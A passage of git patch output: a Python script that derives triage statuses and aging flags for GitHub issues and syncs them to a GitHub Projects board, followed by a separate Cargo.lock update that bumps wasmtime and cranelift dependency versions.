+STATUS_NEEDS_LABELS = "Needs labels" +STATUS_NEEDS_REPRO_ATTEMPT = "Needs repro attempt" +STATUS_USER_REPLIED = "User replied (review)" +STATUS_AWAITING_USER = "Awaiting user" +STATUS_RESPONDED_NO_REPRO = "Responded, no repro" +STATUS_AWAITING_EXTERNAL_REPRO = "Awaiting external repro" # not auto-set; placeholder +STATUS_REPRODUCIBLE = "Reproducible" +STATUS_HANDOFF = "Handoff" +STATUS_HANDOFF_INCOMPLETE = "Handoff (incomplete)" +STATUS_CLAIMED_COMMUNITY = "Claimed by community" +STATUS_CLOSED = "Closed" +STATUS_UNKNOWN = "Unknown" + +# Aging thresholds (days) per spec. +SUBSTANTIVE_COMMENT_MIN_LEN = 50 +AGE_THRESHOLDS_DAYS = { + STATUS_NEEDS_LABELS: 7, + STATUS_NEEDS_REPRO_ATTEMPT: 7, + STATUS_AWAITING_USER: 14, + STATUS_USER_REPLIED: 3, +} + +TERMINAL_OR_RESTING_STATUSES = { + STATUS_REPRODUCIBLE, + STATUS_HANDOFF, + STATUS_CLOSED, + STATUS_RESPONDED_NO_REPRO, + STATUS_CLAIMED_COMMUNITY, +} + +# Issue types that aren't triage work items — administrative collections, +# dashboards, and trackers. The sync detects these and skips field updates; +# they remain in the project (auto-add put them there) but with empty fields, +# invisible in any status-filtered view. Manually remove them in the UI if +# they're cluttering the all-items list. 
+SKIP_ISSUE_TYPES = {"Meta", "Tracking"} + +REST_API = "https://api.github.com" +GRAPHQL_API = "https://api.github.com/graphql" + +NOW = datetime.now(timezone.utc) + + +# --------------------------------------------------------------------------- +# Logging + + +def log(msg: str, level: str = "INFO") -> None: + ts = datetime.now(timezone.utc).strftime("%H:%M:%S") + print(f"[{ts}] [{level}] {msg}", file=sys.stderr, flush=True) + + +# --------------------------------------------------------------------------- +# Auth + + +def get_token() -> str: + token = os.environ.get("GITHUB_TOKEN", "").strip() + if not token: + sys.exit("ERROR: GITHUB_TOKEN env var is required") + return token + + +_TOKEN: str | None = None + + +def headers_rest() -> dict[str, str]: + return { + "Authorization": f"Bearer {_TOKEN}", + "Accept": "application/vnd.github+json", + "X-GitHub-Api-Version": "2022-11-28", + } + + +def headers_graphql() -> dict[str, str]: + return {"Authorization": f"Bearer {_TOKEN}", "Content-Type": "application/json"} + + +# --------------------------------------------------------------------------- +# REST + + +def rest_get(path: str, params: dict | None = None, retries: int = 3) -> dict | list: + url = f"{REST_API}/{path.lstrip('/')}" + last_err: Exception | None = None + for attempt in range(retries): + try: + r = requests.get(url, headers=headers_rest(), params=params, timeout=30) + if r.status_code == 200: + return r.json() + if r.status_code in (429, 502, 503, 504): + wait = 2**attempt * 2 + log(f"REST {r.status_code} on {path}; retry in {wait}s", "WARN") + time.sleep(wait) + continue + log(f"REST GET {path} failed: {r.status_code} {r.text[:200]}", "ERROR") + r.raise_for_status() + except requests.RequestException as e: + last_err = e + wait = 2**attempt * 2 + log(f"REST GET {path} threw {e}; retry in {wait}s", "WARN") + time.sleep(wait) + raise RuntimeError(f"REST GET {path} failed after {retries} retries: {last_err}") + + +def rest_get_paginated(path: str, 
params: dict | None = None, max_pages: int = 20) -> list: + p = dict(params or {}) + p["per_page"] = 100 + out: list = [] + for page in range(1, max_pages + 1): + p["page"] = page + items = rest_get(path, p) + if not items: + break + if not isinstance(items, list): + log(f"REST {path} page {page} returned non-list", "WARN") + break + out.extend(items) + if len(items) < 100: + break + return out + + +# --------------------------------------------------------------------------- +# GraphQL + + +def graphql(query: str, variables: dict | None = None, retries: int = 3) -> dict: + payload = {"query": query, "variables": variables or {}} + last_err: Exception | None = None + for attempt in range(retries): + try: + r = requests.post(GRAPHQL_API, headers=headers_graphql(), json=payload, timeout=30) + if r.status_code == 200: + data = r.json() + if "errors" in data: + log(f"GraphQL errors: {json.dumps(data['errors'])[:400]}", "ERROR") + raise RuntimeError("GraphQL returned errors") + return data["data"] + if r.status_code in (429, 502, 503, 504): + wait = 2**attempt * 2 + log(f"GraphQL {r.status_code}; retry in {wait}s", "WARN") + time.sleep(wait) + continue + log(f"GraphQL HTTP {r.status_code}: {r.text[:300]}", "ERROR") + r.raise_for_status() + except requests.RequestException as e: + last_err = e + wait = 2**attempt * 2 + log(f"GraphQL threw {e}; retry in {wait}s", "WARN") + time.sleep(wait) + raise RuntimeError(f"GraphQL failed after {retries} retries: {last_err}") + + +# --------------------------------------------------------------------------- +# Issue data fetch + + +@dataclass +class IssueData: + number: int + node_id: str + title: str + state: str # "open" / "closed" + closed_at: datetime | None + created_at: datetime + reporter: str + assignees: list[str] + labels: list[str] + issue_type: str | None # e.g. 
"Bug", "Crash", "Meta", "Tracking", or None + is_pull_request: bool + comments: list[dict] + + +def parse_dt(s: str | None) -> datetime | None: + if not s: + return None + return datetime.fromisoformat(s.replace("Z", "+00:00")) + + +def fetch_issue(number: int) -> IssueData: + issue = rest_get(f"repos/{REPO}/issues/{number}") + if not isinstance(issue, dict): + raise RuntimeError(f"unexpected response for issue {number}") + comments = rest_get_paginated(f"repos/{REPO}/issues/{number}/comments") + created_at = parse_dt(issue["created_at"]) + if created_at is None: + raise RuntimeError(f"issue {number} has no created_at") + issue_type = None + if isinstance(issue.get("type"), dict): + issue_type = issue["type"].get("name") + return IssueData( + number=number, + node_id=issue["node_id"], + title=issue["title"], + state=issue["state"], + closed_at=parse_dt(issue.get("closed_at")), + created_at=created_at, + reporter=issue["user"]["login"], + assignees=[a["login"] for a in (issue.get("assignees") or [])], + labels=[l["name"] for l in issue["labels"]], + issue_type=issue_type, + is_pull_request="pull_request" in issue, + comments=comments, + ) + + +# --------------------------------------------------------------------------- +# Staff team + + +_STAFF: set[str] | None = None + + +def fetch_staff() -> set[str]: + global _STAFF + if _STAFF is not None: + return _STAFF + members = rest_get_paginated(f"orgs/{REPO_OWNER}/teams/{STAFF_TEAM_SLUG}/members") + _STAFF = {m["login"] for m in members} + log(f"loaded {len(_STAFF)} staff members") + return _STAFF + + +def is_bot(user: dict) -> bool: + return user.get("type") == "Bot" or user.get("login", "").endswith("[bot]") + + +def is_substantive_staff_comment(comment: dict, staff: set[str]) -> bool: + user = comment.get("user", {}) + if user.get("login") not in staff or is_bot(user): + return False + body = comment.get("body") or "" + if len(body) >= SUBSTANTIVE_COMMENT_MIN_LEN: + return True + # Cheap attachment heuristic: looks 
for media tokens or attachment hosts. + if any( + m in body + for m in ( + "user-attachments/assets", + ".png", + ".jpg", + ".jpeg", + ".gif", + ".mp4", + ".webm", + ".mov", + ) + ): + return True + return False + + +def latest_reporter_activity(issue: IssueData) -> datetime: + times = [issue.created_at] + for c in issue.comments: + if c["user"]["login"] == issue.reporter: + t = parse_dt(c["created_at"]) + if t: + times.append(t) + return max(times) + + +# --------------------------------------------------------------------------- +# Derivation rules +# (Mirrors the spec's R0-R6 cascade. Keep in sync with +# spec.md → "Status derivation rules".) + + +def derive_status(issue: IssueData, staff: set[str]) -> tuple[str, str, str]: + """Returns (status, rule_id, why).""" + L = set(issue.labels) + + if issue.closed_at is not None: + return STATUS_CLOSED, "R1", "issue is closed" + + if "state:claimed by community" in L: + return STATUS_CLAIMED_COMMUNITY, "R0", "state:claimed by community label" + + if "state:reproducible" in L: + if issue.assignees: + return STATUS_REPRODUCIBLE, "R2a", f"reproducible, assignee={','.join(issue.assignees)}" + # R2b vs R2c: any substantive staff comment in the thread? 
+ substantive = None + for c in issue.comments: + if is_substantive_staff_comment(c, staff): + substantive = c + if substantive: + return ( + STATUS_HANDOFF, + "R2b", + f"reproducible, no assignee, staff context @ {substantive['created_at']} " + f"({len(substantive['body'])} chars by @{substantive['user']['login']})", + ) + return ( + STATUS_HANDOFF_INCOMPLETE, + "R2c", + "reproducible, no assignee, no substantive staff comment — close the loop", + ) + + if "state:needs triage" in L: + return STATUS_NEEDS_LABELS, "R3", "state:needs triage label present" + + if "state:needs info" in L: + last_staff = None + for c in issue.comments: + if c["user"]["login"] in staff and not is_bot(c["user"]): + last_staff = c + if last_staff is None: + return STATUS_AWAITING_USER, "R4a", "needs info, no staff comment yet" + last_comment = issue.comments[-1] if issue.comments else None + if last_comment is not None: + author = last_comment["user"]["login"] + non_staff = author not in staff and not is_bot(last_comment["user"]) + if non_staff: + ct = parse_dt(last_comment["created_at"]) + st = parse_dt(last_staff["created_at"]) + if ct and st and ct > st: + relation = "reporter" if author == issue.reporter else "third-party" + return ( + STATUS_USER_REPLIED, + "R4b", + f"{relation} (@{author}) replied {ct.isoformat()} after staff @ {st.isoformat()}", + ) + return ( + STATUS_AWAITING_USER, + "R4a", + f"last staff comment @ {last_staff['created_at']}, no non-staff reply since", + ) + + if "state:needs repro" in L: + cutoff = latest_reporter_activity(issue) + for c in reversed(issue.comments): + ct = parse_dt(c["created_at"]) + if ct and ct > cutoff and is_substantive_staff_comment(c, staff): + return ( + STATUS_RESPONDED_NO_REPRO, + "R5b", + f"staff comment {len(c['body'])} chars by @{c['user']['login']} @ {c['created_at']}", + ) + return STATUS_NEEDS_REPRO_ATTEMPT, "R5a", "no substantive staff comment after reporter's last activity" + + return STATUS_UNKNOWN, "R6", f"open with no 
recognized state label (labels: {sorted(L) or ''})" + + +def derive_stale_since( + issue: IssueData, status: str, staff: set[str] +) -> datetime | None: + """Returns the timestamp anchor used to measure aging, or None.""" + if status in TERMINAL_OR_RESTING_STATUSES or status == STATUS_UNKNOWN: + return None + if status == STATUS_NEEDS_LABELS: + return issue.created_at + if status == STATUS_NEEDS_REPRO_ATTEMPT: + return latest_reporter_activity(issue) + if status == STATUS_AWAITING_USER: + last_staff = None + for c in issue.comments: + if c["user"]["login"] in staff and not is_bot(c["user"]): + last_staff = c + return parse_dt(last_staff["created_at"]) if last_staff else issue.created_at + if status == STATUS_USER_REPLIED: + last_non_staff = None + for c in issue.comments: + u = c["user"] + if u["login"] not in staff and not is_bot(u): + last_non_staff = c + return parse_dt(last_non_staff["created_at"]) if last_non_staff else None + if status == STATUS_HANDOFF_INCOMPLETE: + # Spec: when state:reproducible was applied. Approximation for v0: + # issue.created_at as a weak proxy. Replacing with timeline event lookup + # is a "parked" item. 
+ return issue.created_at + return None + + +def derive_aged(status: str, stale_since: datetime | None) -> tuple[str, str]: + """Returns ('Yes' | 'No', why).""" + if status == STATUS_HANDOFF_INCOMPLETE: + return "Yes", "always-flagged for loop closure" + if status in TERMINAL_OR_RESTING_STATUSES or status == STATUS_UNKNOWN: + return "No", "terminal/resting" + if not stale_since: + return "No", "no stale_since (status not aged-tracked)" + if status not in AGE_THRESHOLDS_DAYS: + return "No", f"status {status} not aged-tracked" + age = NOW - stale_since + threshold = AGE_THRESHOLDS_DAYS[status] + if age > timedelta(days=threshold): + return "Yes", f"{status} for {age.days}d (>{threshold}d)" + return "No", f"{status} for {age.days}d (≤{threshold}d)" + + +# --------------------------------------------------------------------------- +# Project schema cache +# Discovered at runtime by name so the script doesn't break if field IDs +# change (e.g., project recreated). Project number is stable config. + + +_PROJECT_SCHEMA: dict | None = None + + +def fetch_project_schema() -> dict: + """Returns {'id', 'fields_by_name'} where fields_by_name maps name → field dict.""" + global _PROJECT_SCHEMA + if _PROJECT_SCHEMA is not None: + return _PROJECT_SCHEMA + query = """ + query($owner: String!, $number: Int!) { + organization(login: $owner) { + projectV2(number: $number) { + id + fields(first: 30) { + nodes { + __typename + ... on ProjectV2Field { id name dataType } + ... on ProjectV2SingleSelectField { + id name dataType options { id name } + } + ... 
on ProjectV2IterationField { + id name dataType + configuration { + duration startDay + iterations { id title startDate duration } + completedIterations { id title startDate duration } + } + } + } + } + } + } + } + """ + data = graphql(query, {"owner": PROJECT_OWNER, "number": PROJECT_NUMBER}) + proj = data["organization"]["projectV2"] + if not proj: + sys.exit(f"ERROR: project #{PROJECT_NUMBER} not found in {PROJECT_OWNER}") + fields_by_name = {f["name"]: f for f in proj["fields"]["nodes"]} + required = ["Status", "Intake week", "Stale since", "Aged?"] + missing = [n for n in required if n not in fields_by_name] + if missing: + sys.exit(f"ERROR: project missing required fields: {missing}") + _PROJECT_SCHEMA = {"id": proj["id"], "fields_by_name": fields_by_name} + log(f"loaded project schema: id={proj['id']}, fields={list(fields_by_name)}") + return _PROJECT_SCHEMA + + +def status_option_id(status_name: str) -> str | None: + schema = fetch_project_schema() + for opt in schema["fields_by_name"]["Status"]["options"]: + if opt["name"] == status_name: + return opt["id"] + return None + + +def aged_option_id(value: str) -> str | None: + schema = fetch_project_schema() + for opt in schema["fields_by_name"]["Aged?"]["options"]: + if opt["name"] == value: + return opt["id"] + return None + + +def iteration_id_for_date(d: datetime) -> str | None: + schema = fetch_project_schema() + field = schema["fields_by_name"]["Intake week"] + cfg = field["configuration"] + iterations = list(cfg.get("iterations") or []) + list(cfg.get("completedIterations") or []) + for it in iterations: + start = parse_dt(it["startDate"] + "T00:00:00+00:00") + if start is None: + continue + end = start + timedelta(days=int(it["duration"])) + if start <= d < end: + return it["id"] + return None + + +# --------------------------------------------------------------------------- +# Project item lookup / mutation + + +def get_project_item_id(issue_node_id: str) -> str | None: + """Returns the 
ProjectV2Item.id for the issue in our project, or None.""" + schema = fetch_project_schema() + project_id = schema["id"] + query = """ + query($issueId: ID!) { + node(id: $issueId) { + ... on Issue { + projectItems(first: 100) { + pageInfo { hasNextPage } + nodes { id project { id } } + } + } + } + } + """ + data = graphql(query, {"issueId": issue_node_id}) + node = data["node"] + if not node: + return None + items_block = node["projectItems"] + for item in items_block["nodes"]: + if item["project"]["id"] == project_id: + return item["id"] + if items_block["pageInfo"]["hasNextPage"]: + # Issue is on >100 projects; very unlikely. Log + return None. + log(f"issue {issue_node_id} on >100 projects, can't find ours in first page", "WARN") + return None + + +def add_to_project(issue_node_id: str) -> str: + schema = fetch_project_schema() + mutation = """ + mutation($projectId: ID!, $issueId: ID!) { + addProjectV2ItemById(input: { projectId: $projectId, contentId: $issueId }) { + item { id } + } + } + """ + data = graphql(mutation, {"projectId": schema["id"], "issueId": issue_node_id}) + return data["addProjectV2ItemById"]["item"]["id"] + + + + +def update_single_select(item_id: str, field_id: str, option_id: str, dry_run: bool) -> None: + if dry_run: + log(f" [DRY] single-select field={field_id} option={option_id} on item={item_id}") + return + schema = fetch_project_schema() + mutation = """ + mutation($projectId: ID!, $itemId: ID!, $fieldId: ID!, $optionId: String!) 
{ + updateProjectV2ItemFieldValue(input: { + projectId: $projectId, itemId: $itemId, fieldId: $fieldId, + value: { singleSelectOptionId: $optionId } + }) { projectV2Item { id } } + } + """ + graphql( + mutation, + { + "projectId": schema["id"], + "itemId": item_id, + "fieldId": field_id, + "optionId": option_id, + }, + ) + + +def update_date(item_id: str, field_id: str, date_iso: str, dry_run: bool) -> None: + if dry_run: + log(f" [DRY] date field={field_id} value={date_iso} on item={item_id}") + return + schema = fetch_project_schema() + mutation = """ + mutation($projectId: ID!, $itemId: ID!, $fieldId: ID!, $date: Date!) { + updateProjectV2ItemFieldValue(input: { + projectId: $projectId, itemId: $itemId, fieldId: $fieldId, + value: { date: $date } + }) { projectV2Item { id } } + } + """ + graphql( + mutation, + {"projectId": schema["id"], "itemId": item_id, "fieldId": field_id, "date": date_iso}, + ) + + +def update_iteration(item_id: str, field_id: str, iteration_id: str, dry_run: bool) -> None: + if dry_run: + log(f" [DRY] iteration field={field_id} value={iteration_id} on item={item_id}") + return + schema = fetch_project_schema() + mutation = """ + mutation($projectId: ID!, $itemId: ID!, $fieldId: ID!, $iterId: String!) { + updateProjectV2ItemFieldValue(input: { + projectId: $projectId, itemId: $itemId, fieldId: $fieldId, + value: { iterationId: $iterId } + }) { projectV2Item { id } } + } + """ + graphql( + mutation, + { + "projectId": schema["id"], + "itemId": item_id, + "fieldId": field_id, + "iterId": iteration_id, + }, + ) + + +# --------------------------------------------------------------------------- +# Sync + + +def sync_issue(number: int, dry_run: bool = False) -> None: + """Sync a single issue. Adds to project if missing, then updates fields. + + Idempotent — running twice with the same issue state has no effect after + the first run. 
+ """ + log(f"sync #{number} (dry_run={dry_run})") + issue = fetch_issue(number) + + if issue.is_pull_request: + log(f" #{number} is a PR; skipping (project tracks issues)") + return + + # Skip administrative issue types (Meta, Tracking, etc.). These are + # collections / dashboards, not triage work. The script doesn't have + # permission to remove items from the project (intentional — narrows blast + # radius). Existing Meta/Tracking items in the project should be removed + # manually one-time; new ones get auto-added by the project's auto-add + # workflow but the sync below skips them, so they sit with no Status / + # Aged? / Stale since fields set and don't appear in any status-filtered + # view. + if issue.issue_type in SKIP_ISSUE_TYPES: + log(f" #{number} is type={issue.issue_type}; not a triage item, skipping fields") + return + + staff = fetch_staff() + + status, rule, why = derive_status(issue, staff) + stale_since = derive_stale_since(issue, status, staff) + aged, aged_why = derive_aged(status, stale_since) + intake_iter_id = iteration_id_for_date(issue.created_at) + + log(f" status={status} ({rule}: {why})") + log(f" stale_since={stale_since.isoformat() if stale_since else 'none'}") + log(f" aged={aged} ({aged_why})") + log(f" intake_iteration_id={intake_iter_id or 'none (created_at outside iteration range)'}") + + schema = fetch_project_schema() + item_id = get_project_item_id(issue.node_id) + if not item_id: + if dry_run: + log(" [DRY] would add to project (item not yet present)") + return + item_id = add_to_project(issue.node_id) + log(f" added to project as item={item_id}") + + # Status (always set) + sid = status_option_id(status) + if not sid: + log(f" ERROR: no Status option named '{status}' in project; skipping status update", "ERROR") + else: + update_single_select( + item_id, schema["fields_by_name"]["Status"]["id"], sid, dry_run + ) + + # Aged? (always set) + aged_id = aged_option_id(aged) + if not aged_id: + log(f" ERROR: no Aged? 
option named '{aged}'; skipping", "ERROR") + else: + update_single_select( + item_id, schema["fields_by_name"]["Aged?"]["id"], aged_id, dry_run + ) + + # Stale since (only set when meaningful) + if stale_since: + update_date( + item_id, + schema["fields_by_name"]["Stale since"]["id"], + stale_since.date().isoformat(), + dry_run, + ) + + # Intake week (only set when an iteration covers the created_at) + if intake_iter_id: + update_iteration( + item_id, + schema["fields_by_name"]["Intake week"]["id"], + intake_iter_id, + dry_run, + ) + + +def sync_all(dry_run: bool = False) -> None: + """Sync every item currently in the project. Cron mode.""" + log("fetching all project items…") + cursor: str | None = None + total = 0 + failed = 0 + while True: + query = """ + query($owner: String!, $number: Int!, $cursor: String) { + organization(login: $owner) { + projectV2(number: $number) { + items(first: 100, after: $cursor) { + pageInfo { hasNextPage endCursor } + nodes { + id + content { + __typename + ... on Issue { number } + ... 
on PullRequest { number } + } + } + } + } + } + } + """ + data = graphql( + query, {"owner": PROJECT_OWNER, "number": PROJECT_NUMBER, "cursor": cursor} + ) + items_block = data["organization"]["projectV2"]["items"] + for item in items_block["nodes"]: + content = item.get("content") + if not content: + continue + if content["__typename"] != "Issue": + continue + num = content["number"] + try: + sync_issue(num, dry_run=dry_run) + except Exception as e: + log(f"sync #{num} failed: {e}", "ERROR") + failed += 1 + total += 1 + if not items_block["pageInfo"]["hasNextPage"]: + break + cursor = items_block["pageInfo"]["endCursor"] + log(f"done: synced {total} items, {failed} failed") + + +# --------------------------------------------------------------------------- +# Main + + +def main() -> int: + global _TOKEN + + ap = argparse.ArgumentParser(description=__doc__) + grp = ap.add_mutually_exclusive_group(required=True) + grp.add_argument("--issue", type=int, help="sync a single issue by number") + grp.add_argument("--all", action="store_true", help="sync every project item") + ap.add_argument("--dry-run", action="store_true", help="compute but don't mutate") + args = ap.parse_args() + + _TOKEN = get_token() + + if args.issue: + sync_issue(args.issue, dry_run=args.dry_run) + elif args.all: + sync_all(dry_run=args.dry_run) + + return 0 + + +if __name__ == "__main__": + sys.exit(main()) From 2373ae36dc930543b0428ec6dfaee04d408fe0c8 Mon Sep 17 00:00:00 2001 From: Ben Brandt Date: Tue, 5 May 2026 21:29:49 +0200 Subject: [PATCH 209/231] Update to wasmtime 36.0.9 (#55811) Brings in backported fixes to solve some panics we've been seeing Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance 
impact has been considered and is acceptable Release Notes: - N/A --- Cargo.lock | 168 ++++++++++++++++++++++++++--------------------------- 1 file changed, 84 insertions(+), 84 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 083aeeef57b9ed..2a28d8922505ea 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -3960,36 +3960,36 @@ dependencies = [ [[package]] name = "cranelift-assembler-x64" -version = "0.123.8" +version = "0.123.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cb1ffe339f197d6645b4d3037edf67c13cd3aa8871f29c2c9c046c729c1b9a17" +checksum = "44f81cede359311706057b689b91b59f464926de0316f389898a2b028cb494fa" dependencies = [ "cranelift-assembler-x64-meta", ] [[package]] name = "cranelift-assembler-x64-meta" -version = "0.123.8" +version = "0.123.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1e81a21df73d1b12ed19eba481c08de8891e179e1870ed28d6e397f7746108f5" +checksum = "fa6ca11305de425ea08884097b913ebe1a83875253b3c0063ce28411e226bfdc" dependencies = [ "cranelift-srcgen", ] [[package]] name = "cranelift-bforest" -version = "0.123.8" +version = "0.123.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3cf917d0180c15c945c13c8dde615d32a015769513b29158f728311d85a8f80d" +checksum = "7537341a9a4ba9812141927be733e7254bf2318aab6597d567af9cad90609f27" dependencies = [ "cranelift-entity", ] [[package]] name = "cranelift-bitset" -version = "0.123.8" +version = "0.123.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a6f4e1af2df00798c2895d228bb53d65c5aa09acace8525096f0b53830ffe42c" +checksum = "d28a4ca5faf25ff821fcc768f26e68ffef505e9f71bb06e608862d941fa65086" dependencies = [ "serde", "serde_derive", @@ -3997,9 +3997,9 @@ dependencies = [ [[package]] name = "cranelift-codegen" -version = "0.123.8" +version = "0.123.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = 
"4e3a5d7300e4b44933dcf2947399945abe3f30f92c789b496ad72949e3ee15a6" +checksum = "d891057fe1b73910c41e73b32a70fa8454092fce65942b5fa6f72aa6d5487f8a" dependencies = [ "bumpalo", "cranelift-assembler-x64", @@ -4027,9 +4027,9 @@ dependencies = [ [[package]] name = "cranelift-codegen-meta" -version = "0.123.8" +version = "0.123.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "becdb5c3111800d7f8e666fe5f35693bfc77de4401bfcaea19815caf7c482fb9" +checksum = "c29a66028a78eedc534b3a94e5ebfbaeb4e1f6b09038afe41bb24afd614faa4b" dependencies = [ "cranelift-assembler-x64-meta", "cranelift-codegen-shared", @@ -4040,24 +4040,24 @@ dependencies = [ [[package]] name = "cranelift-codegen-shared" -version = "0.123.8" +version = "0.123.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d8fa77efffa12934971f757e154b16dd5e369a7f388a0f3adff74aadfd4c5a1d" +checksum = "95809ad251fe9422087b4a72d61e584d6ab6eff44dee1335f93cfaea0bedc9ac" [[package]] name = "cranelift-control" -version = "0.123.8" +version = "0.123.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "62441d3aae3372381e03a121880482158ce90ca3bc2a56607cc122ee07536fe4" +checksum = "f79d0cacf063c297e5e8d5b73cb355b41b87f6d248e252d1b284e7a7b73673c2" dependencies = [ "arbitrary", ] [[package]] name = "cranelift-entity" -version = "0.123.8" +version = "0.123.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7bdc9832a010e0d411439aa016e1664dd23ca5c8953bf26b90fe34ad4b76822d" +checksum = "b2d73297a195ce3be55997c6307142c4b1e58dd0c2f18ceaa0179444024e312a" dependencies = [ "cranelift-bitset", "serde", @@ -4066,9 +4066,9 @@ dependencies = [ [[package]] name = "cranelift-frontend" -version = "0.123.8" +version = "0.123.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9530b689b7c3accdbb32263ca318e19ab3bcf616d3a160c8456537c99b4c565b" +checksum = 
"3be38d1ae29ef7c5d611fc6cb694f698dc4ca44152dcaa112ec0fef8d4d34858" dependencies = [ "cranelift-codegen", "log", @@ -4078,15 +4078,15 @@ dependencies = [ [[package]] name = "cranelift-isle" -version = "0.123.8" +version = "0.123.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3fcd3258a4d87376f2681c72269a42009286a3d3707b2af4024ba5b3750ad477" +checksum = "6761926f6636209de7ac568be28b206890f2181761375b9722e0a1e7a7e1637a" [[package]] name = "cranelift-native" -version = "0.123.8" +version = "0.123.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "642c5703a22b58abccbf46f46c0dae65f0535bbe725beec70527a1ffcbbc1d34" +checksum = "0893472f73f0d530a28e9a573ada6d1f93b9659bb6734dfe17061ac967bd1830" dependencies = [ "cranelift-codegen", "libc", @@ -4095,9 +4095,9 @@ dependencies = [ [[package]] name = "cranelift-srcgen" -version = "0.123.8" +version = "0.123.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d200dcd5a37de108ec1329e0ba924e2badd2c0ef2343c338310135159ae454e2" +checksum = "c1daccebabb1ccd034dbab0eacc0722af27d3cccc7929dea27a3546cb3562e40" [[package]] name = "crash-context" @@ -5021,7 +5021,7 @@ dependencies = [ "libc", "option-ext", "redox_users", - "windows-sys 0.59.0", + "windows-sys 0.61.2", ] [[package]] @@ -5811,7 +5811,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "39cab71617ae0d63f51a36d69f866391735b51691dbda63cf6f96d042b63efeb" dependencies = [ "libc", - "windows-sys 0.52.0", + "windows-sys 0.61.2", ] [[package]] @@ -7269,7 +7269,7 @@ dependencies = [ "gobject-sys", "libc", "system-deps", - "windows-sys 0.52.0", + "windows-sys 0.61.2", ] [[package]] @@ -8597,7 +8597,7 @@ dependencies = [ "libc", "percent-encoding", "pin-project-lite", - "socket2 0.6.3", + "socket2 0.5.10", "tokio", "tower-service", "tracing", @@ -8615,7 +8615,7 @@ dependencies = [ "js-sys", "log", "wasm-bindgen", - "windows-core 0.56.0", + "windows-core 0.57.0", ] 
[[package]] @@ -11264,7 +11264,7 @@ version = "0.50.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "7957b9740744892f114936ab4a57b3f487491bbeafaf8083688b16841a4240e5" dependencies = [ - "windows-sys 0.59.0", + "windows-sys 0.61.2", ] [[package]] @@ -13879,9 +13879,9 @@ checksum = "bd348ff538bc9caeda7ee8cad2d1d48236a1f443c1fa3913c6a02fe0043b1dd3" [[package]] name = "pulley-interpreter" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "35eaba3163b9faf1d707f0704a7370bfdbe73622c766acdaf1fa4addb87510de" +checksum = "8b78fdec962b639b921badfcfe77db7d18aa3c0c1e292ac2aa268c0efe8fe683" dependencies = [ "cranelift-bitset", "log", @@ -13891,9 +13891,9 @@ dependencies = [ [[package]] name = "pulley-macros" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ac294897a29ce07919714f9f25c11a819d75759d47eb9f3273845ffea5a5760d" +checksum = "f718f4e8cd5fdfa08b3b1d2d25fe288350051be330544305f0a9b93a937b3d42" dependencies = [ "proc-macro2", "quote", @@ -13996,7 +13996,7 @@ dependencies = [ "quinn-udp", "rustc-hash 2.1.1", "rustls 0.23.40", - "socket2 0.6.3", + "socket2 0.5.10", "thiserror 2.0.17", "tokio", "tracing", @@ -14033,9 +14033,9 @@ dependencies = [ "cfg_aliases 0.2.1", "libc", "once_cell", - "socket2 0.6.3", + "socket2 0.5.10", "tracing", - "windows-sys 0.52.0", + "windows-sys 0.60.2", ] [[package]] @@ -15251,7 +15251,7 @@ dependencies = [ "errno 0.3.14", "libc", "linux-raw-sys 0.11.0", - "windows-sys 0.52.0", + "windows-sys 0.61.2", ] [[package]] @@ -17739,7 +17739,7 @@ dependencies = [ "getrandom 0.3.4", "once_cell", "rustix 1.1.2", - "windows-sys 0.52.0", + "windows-sys 0.61.2", ] [[package]] @@ -19938,9 +19938,9 @@ dependencies = [ [[package]] name = "wasmtime" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = 
"2060d93be880840d764ab537464b916e22c07758ac5d43e5f07cc86fec6d1bec" +checksum = "b10306ead921db2c4645ff99867b7539b65e18afd8816d471547f5e6f3b09492" dependencies = [ "addr2line", "anyhow", @@ -19999,9 +19999,9 @@ dependencies = [ [[package]] name = "wasmtime-environ" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "902f991ca8c2e5abc03119eb5d7f7f57da1b7c2123addb8214b49c188737711e" +checksum = "e7fb2c37ca263d444f33871bf0221e7de0707b2b2bb88165df6db6d58c73375f" dependencies = [ "anyhow", "cpp_demangle", @@ -20026,9 +20026,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-asm-macros" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b02cec619b54ce7652d1d7676718a42ccf5f16b2fb23c27cd6e3c307bc93907a" +checksum = "19c6c0d3c8d2db554a3af8e8d413ff2815362ebce0911808ecfdaaa257438f93" dependencies = [ "cfg-if", ] @@ -20045,9 +20045,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-component-macro" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "fad82a87bc24b6014c5271e1558e466fd029dcc80896f143b3693394a162f3be" +checksum = "c3e3f3752466eb0e1f97149e53bf15c0e18ff520fc0a98b4bee1680e6de1c6f0" dependencies = [ "anyhow", "proc-macro2", @@ -20060,15 +20060,15 @@ dependencies = 